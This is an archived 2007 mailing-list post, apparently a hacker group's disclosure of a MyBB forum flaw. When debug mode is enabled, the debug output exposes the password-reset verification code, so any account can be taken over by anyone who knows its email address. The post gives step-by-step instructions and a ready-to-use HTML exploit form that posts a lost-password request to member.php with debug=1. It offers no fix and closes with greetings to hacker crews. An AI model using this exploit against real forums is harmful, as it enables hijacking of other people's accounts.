|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
security
soqor.net
Date: Thu Mar 29 2007 - 19:21:14 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Hello,,
Mybb Change Password Vulnerability
Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : securitysoqor.net
If You Can Use the debug mode you will be able to change the password for and user by knowing the registered email address
Enter the email in the html code below after changing the website and mybb_dir to true variables then enter any user email address
Look at the query number 12 or search for awaitingactivation you will find like
INSERT INTO mybb123_awaitingactivation (uid, dateline, code, type) VALUES ('1', 'XXXX', 'ADbSXnoM', 'p')
--- >> ('1', 'XXXX', 'ADbSXnoM', 'p')
1 is the userid , XXXX is the time ,
ADbSXnoM' is the change password verification code ,
'p' is the type which is password change
<<<HTM EXPLOIT
<form action="http://website/mybb_dir/member.php?debug=1" method="post">
<table border="0" cellspacing="1" cellpadding="4" class="tborder">
<tr>
<td class="trow1" width="40%"><strong>Email Address:</strong></td>
<td class="trow1" width="60%"><input type="text" class="textbox" name="email" /></td>
</tr>
<tr><td wlign=center>
<input type="hidden" name="action" value="do_lostpw" />
<input type="submit" class="button" value="Enter Here" />
</td></tr>
</table>
</form>
>>>
GrEEtZ : DeviL-00 , Dr.ExE , GaCkeR , Sp1deR_Net , Black AttaCk , MiniMan , JareeH BaghdaD;
Special GrEEtZ For : MohAjali AnD SoQoR.NeT TeaM AnD MemberS;
End of it :)
WwW.SoQoR.NeT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]